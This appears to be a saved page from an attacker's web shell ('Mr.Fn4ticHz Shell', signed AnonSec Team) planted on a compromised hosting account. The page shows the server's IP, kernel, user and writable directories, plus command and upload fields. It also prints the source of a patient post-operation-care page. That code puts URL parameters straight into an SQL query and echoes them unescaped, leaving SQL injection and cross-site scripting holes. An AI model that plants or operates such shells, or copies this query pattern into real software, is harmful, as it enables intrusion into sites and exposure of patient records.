Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.145.40.189
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/show_Post_Operation_Care.php
<?php
session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
?>
 <style>
                     
       .center {
   border: 1px solid grey;
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
</style>

   <div class='center'>
       <div class="container">
    <div class="row">
        <div class="col-sm-6"></div>
        <div class="col-sm-4"></div>
        <div class="col-sm-2">
            <a href="edit_Post_Operation_Care.php?prescriptionid=<?php echo $_GET['prescriptionid'] ?>&patientid=<?php echo $_GET['patientid'] ?>&surgeryid=<?php echo $_GET['surgeryid'] ?>"><i class="fa fa-pencil-square-o" aria-hidden="true" style="font-size:30px;"></i></a>
        </div>
    </div>
</div>
       <table id='example2' class='table table-bordered table-hover'>
<?php 
		$sql ="SELECT * FROM Operation_Plan WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    if($rs['Analgesia_Plan']=='on'){
		        $a= '<i class="fa fa-check-circle" aria-hidden="true" style="color:green;font-size:20px;"></i>';
		    }else{
		        $a= '<i class="fa fa-times" aria-hidden="true"style="color:red;font-size:20px;"></i>';
		    }
		    echo "
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Post Operation Analgesia Plan Explained: </td>
<td width='50%'>$a</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Note  :  </td>
<td width='50%'>$rs[Analgesia_Plan_Note]</td>
</tr>";
}
?>

				</table>
</div>


Anon7 - 2022
AnonSec Team